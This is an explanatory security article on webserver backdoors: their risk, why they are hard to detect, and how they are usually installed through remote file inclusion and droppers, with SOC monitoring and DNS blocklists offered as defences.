by peter


Backdoor Explained


Risk Rating: HIGH
Likelihood: 3/5
Impact: 5/5


  • Lack of endpoint protection

  • Lack of monitoring
  • Poor patching

Backdoor Overview

A backdoor is a remote access method used by Advanced Persistent Threats and by malware that negates normal authentication procedures to access a system. As a result, remote access is granted to resources within an application, such as databases and file servers, giving perpetrators the ability to remotely issue system commands and update malware.

Backdoor installation is achieved by taking advantage of vulnerable components in a web application. Once installed, detection is difficult as files tend to be highly obfuscated.

Webserver backdoors are used for a number of malicious activities, including:

What you need to know about Backdoors

Once installed, backdoors are very hard to weed out. Traditionally, detection involves using software scanners to search for known malware signatures in a server file system. Backdoors can occasionally be detected through vulnerability scanning. This process is error prone, however. Backdoor shell files are almost always masked through the use of alias names and—more significantly—code obfuscation (sometimes even multiple layers of encryption).

Detection is further complicated since many applications are built on external frameworks that use third-party plugins; these are sometimes laden with vulnerabilities or built-in backdoors. Scanners that rely on heuristic and signature-based rules might not be able to detect hidden code in such frameworks.

Even if the malware is detected, typical mitigation methods (or even a system reinstallation) are unlikely to remove it from an application. This is particularly true for when they employ a persistent presence in re-writable memory.

The best detection method is through your Security Operations Center. They should be detecting the compromise and preventing it from occurring. Having a DNS service such as the Quad 9 project in place, or DNS Black Lists, will hinder a Backdoors ability to maintain persistence.

How Backdoor attacks happens

The most prevalent backdoor installation method involves remote file inclusion (RFI), an attack vector that exploits vulnerabilities within applications that dynamically reference external scripts. In an RFI scenario, the referencing function is tricked into downloading a backdoor Trojan from a remote host.

Perpetrators typically identify targets using scanners, which locate websites having unpatched or outdated components that enable file injection. A successful scanner then abuses the vulnerability to install the backdoor on the underlying server. Once installed, it can be accessed at any time, even if the vulnerability enabling its injection has since been patched.

Backdoor Trojan injection is often done in a two-step process to bypass security rules preventing the upload of files above a certain size. The first phase involves installation of a dropper—a small file whose sole function is to retrieve a bigger file from a remote location. It initiates the second phase—the downloading and installation of the backdoor script on the server.

Attack Sources

Backdoors occur only after a successful compromise of a system in some form. The attacks can come from anywhere but are most likely to be sending traffic out to unusual IP addresses. This should be picked up by your Security Operations Center.